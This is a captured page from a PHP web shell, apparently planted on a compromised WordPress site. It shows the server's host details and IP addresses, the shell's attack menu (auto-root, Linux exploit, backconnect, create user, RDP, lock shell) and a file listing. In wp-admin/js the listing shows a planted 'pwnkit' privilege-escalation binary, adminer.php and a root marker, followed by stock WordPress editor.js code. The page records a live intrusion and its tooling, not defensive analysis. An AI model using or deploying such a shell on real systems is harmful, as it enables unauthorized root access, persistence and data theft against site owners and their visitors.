Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
tobeuls /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cat.js
556
B
-rwxr--r--
categories.js
658
B
-rwxr--r--
comment.js
897
B
-rwxr--r--
common.js
1.26
KB
-rwxr--r--
custom-fields.js
968
B
-rwxr--r--
dbx-admin-key.js
1.76
KB
-rwxr--r--
edit-comments.js
2.53
KB
-rwxr--r--
editor.js
7.44
KB
-rwxr--r--
forms.js
859
B
-rwxr--r--
gallery.js
684
B
-rwxr--r--
link-cat.js
778
B
-rwxr--r--
link.js
1.7
KB
-rwxr--r--
media-upload.js
1.64
KB
-rwxr--r--
page.js
1.09
KB
-rwxr--r--
password-strength-meter.js
2.52
KB
-rwxr--r--
post.js
6.88
KB
-rwxr--r--
postbox.js
549
B
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions-js.php
2.92
KB
-rwxr--r--
slug.js
1.7
KB
-rwxr--r--
tags.js
547
B
-rwxr--r--
theme-preview.js
1.43
KB
-rwxr--r--
upload.js
12.91
KB
-rwxr--r--
users.js
49
B
-rwxr--r--
widgets.js
4.59
KB
-rwxr--r--
word-count.js
967
B
-rwxr--r--
wp-gears.js
2.69
KB
-rwxr--r--
xfn.js
1.26
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editor.js
wpEditorInit = function() { // Activate tinyMCE if it's the user's default editor if ( ( 'undefined' == typeof wpTinyMCEConfig ) || 'tinymce' == wpTinyMCEConfig.defaultEditor ) { document.getElementById('editorcontainer').style.padding = '0px'; tinyMCE.execCommand("mceAddControl", false, "content"); } else { var H; if ( H = tinymce.util.Cookie.getHash("TinyMCE_content_size") ) document.getElementById('content').style.height = H.ch - 30 + 'px'; } }; switchEditors = { saveCallback : function(el, content, body) { document.getElementById(el).style.color = '#fff'; if ( tinyMCE.activeEditor.isHidden() ) content = document.getElementById(el).value; else content = this.pre_wpautop(content); return content; }, pre_wpautop : function(content) { // We have a TON of cleanup to do. Line breaks are already stripped. // Protect pre|script tags content = content.replace(/<(pre|script)[^>]*>[\s\S]+?<\/\1>/g, function(a) { a = a.replace(/<br ?\/?>[\r\n]*/g, '<wp_temp>'); return a.replace(/<\/?p( [^>]*)?>[\r\n]*/g, '<wp_temp>'); }); // Pretty it up for the source editor var blocklist1 = 'blockquote|ul|ol|li|table|thead|tbody|tr|th|td|div|h[1-6]|p'; content = content.replace(new RegExp('\\s*</('+blocklist1+')>\\s*', 'mg'), '</$1>\n'); content = content.replace(new RegExp('\\s*<(('+blocklist1+')[^>]*)>', 'mg'), '\n<$1>'); // Mark </p> if it has any attributes. content = content.replace(new RegExp('(<p [^>]+>.*?)</p>', 'mg'), '$1</p#>'); // Sepatate <div> containing <p> content = content.replace(new RegExp('<div([^>]*)>\\s*<p>', 'mgi'), '<div$1>\n\n'); // Remove <p> and <br /> content = content.replace(new RegExp('\\s*<p>', 'mgi'), ''); content = content.replace(new RegExp('\\s*</p>\\s*', 'mgi'), '\n\n'); content = content.replace(new RegExp('\\n\\s*\\n', 'mgi'), '\n\n'); content = content.replace(new RegExp('\\s*<br ?/?>\\s*', 'gi'), '\n'); // Fix some block element newline issues content = content.replace(new RegExp('\\s*<div', 'mg'), '\n<div'); content = content.replace(new RegExp('</div>\\s*', 'mg'), '</div>\n'); content = content.replace(new RegExp('\\s*\\[caption([^\\[]+)\\[/caption\\]\\s*', 'gi'), '\n\n[caption$1[/caption]\n\n'); content = content.replace(new RegExp('caption\\]\\n\\n+\\[caption', 'g'), 'caption]\n\n[caption'); var blocklist2 = 'blockquote|ul|ol|li|table|thead|tr|th|td|h[1-6]|pre'; content = content.replace(new RegExp('\\s*<(('+blocklist2+') ?[^>]*)\\s*>', 'mg'), '\n<$1>'); content = content.replace(new RegExp('\\s*</('+blocklist2+')>\\s*', 'mg'), '</$1>\n'); content = content.replace(new RegExp('<li([^>]*)>', 'g'), '\t<li$1>'); if ( content.indexOf('<object') != -1 ) { content = content.replace(new RegExp('\\s*<param([^>]*)>\\s*', 'mg'), "<param$1>"); content = content.replace(new RegExp('\\s*</embed>\\s*', 'mg'), '</embed>'); } // Unmark special paragraph closing tags content = content.replace(new RegExp('</p#>', 'g'), '</p>\n'); content = content.replace(new RegExp('\\s*(<p [^>]+>.*</p>)', 'mg'), '\n$1'); // Trim whitespace content = content.replace(new RegExp('^\\s*', ''), ''); content = content.replace(new RegExp('[\\s\\u00a0]*$', ''), ''); // put back the line breaks in pre|script content = content.replace(/<wp_temp>/g, '\n'); // Hope. return content; }, go : function(id) { var ed = tinyMCE.get(id); var qt = document.getElementById('quicktags'); var H = document.getElementById('edButtonHTML'); var P = document.getElementById('edButtonPreview'); var ta = document.getElementById(id); var ec = document.getElementById('editorcontainer'); if ( ! ed || ed.isHidden() ) { ta.style.color = '#fff'; this.edToggle(P, H); edCloseAllTags(); // :-( qt.style.display = 'none'; ec.style.padding = '0px'; ta.style.padding = '0px'; ta.value = this.wpautop(ta.value); if ( ed ) ed.show(); else tinyMCE.execCommand("mceAddControl", false, id); this.wpSetDefaultEditor('tinymce'); } else { this.edToggle(H, P); ta.style.height = ed.getContentAreaContainer().offsetHeight + 6 + 'px'; ed.hide(); qt.style.display = 'block'; if ( tinymce.isIE6 ) { ta.style.width = '98%'; ec.style.padding = '0px'; ta.style.padding = '6px'; } else { ta.style.width = '100%'; ec.style.padding = '6px'; } ta.style.color = ''; this.wpSetDefaultEditor('html'); } }, edToggle : function(A, B) { A.className = 'active'; B.className = ''; B.onclick = A.onclick; A.onclick = null; }, wpSetDefaultEditor : function(editor) { try { editor = escape( editor.toString() ); } catch(err) { editor = 'tinymce'; } var userID = document.getElementById('user-id'); var date = new Date(); date.setTime(date.getTime()+(10*365*24*60*60*1000)); document.cookie = "wordpress_editor_" + userID.value + "=" + editor + "; expires=" + date.toGMTString(); }, wpautop : function(pee) { var blocklist = 'table|thead|tfoot|caption|colgroup|tbody|tr|td|th|div|dl|dd|dt|ul|ol|li|pre|select|form|blockquote|address|math|p|h[1-6]'; pee = pee + "\n\n"; pee = pee.replace(new RegExp('<br />\\s*<br />', 'gi'), "\n\n"); pee = pee.replace(new RegExp('(<(?:'+blocklist+')[^>]*>)', 'gi'), "\n$1"); pee = pee.replace(new RegExp('(</(?:'+blocklist+')>)', 'gi'), "$1\n\n"); pee = pee.replace(new RegExp("\\r\\n|\\r", 'g'), "\n"); pee = pee.replace(new RegExp("\\n\\s*\\n+", 'g'), "\n\n"); pee = pee.replace(new RegExp('([\\s\\S]+?)\\n\\n', 'mg'), "<p>$1</p>\n"); pee = pee.replace(new RegExp('<p>\\s*?</p>', 'gi'), ''); pee = pee.replace(new RegExp('<p>\\s*(</?(?:'+blocklist+')[^>]*>)\\s*</p>', 'gi'), "$1"); pee = pee.replace(new RegExp("<p>(<li.+?)</p>", 'gi'), "$1"); pee = pee.replace(new RegExp('<p>\\s*<blockquote([^>]*)>', 'gi'), "<blockquote$1><p>"); pee = pee.replace(new RegExp('</blockquote>\\s*</p>', 'gi'), '</p></blockquote>'); pee = pee.replace(new RegExp('<p>\\s*(</?(?:'+blocklist+')[^>]*>)', 'gi'), "$1"); pee = pee.replace(new RegExp('(</?(?:'+blocklist+')[^>]*>)\\s*</p>', 'gi'), "$1"); pee = pee.replace(new RegExp('\\s*\\n', 'gi'), "<br />\n"); pee = pee.replace(new RegExp('(</?(?:'+blocklist+')[^>]*>)\\s*<br />', 'gi'), "$1"); pee = pee.replace(new RegExp('<br />(\\s*</?(?:p|li|div|dl|dd|dt|th|pre|td|ul|ol)>)', 'gi'), '$1'); pee = pee.replace(new RegExp('(?:<p>|<br ?/?>)*\\s*\\[caption([^\\[]+)\\[/caption\\]\\s*(?:</p>|<br ?/?>)*', 'gi'), '[caption$1[/caption]'); // pee = pee.replace(new RegExp('^((?: )*)\\s', 'mg'), '$1 '); // Fix the pre|script tags pee = pee.replace(/<(pre|script)[^>]*>[\s\S]+?<\/\1>/g, function(a) { a = a.replace(/<br ?\/?>[\r\n]*/g, '\n'); return a.replace(/<\/?p( [^>]*)?>[\r\n]*/g, '\n'); }); return pee; } }
Close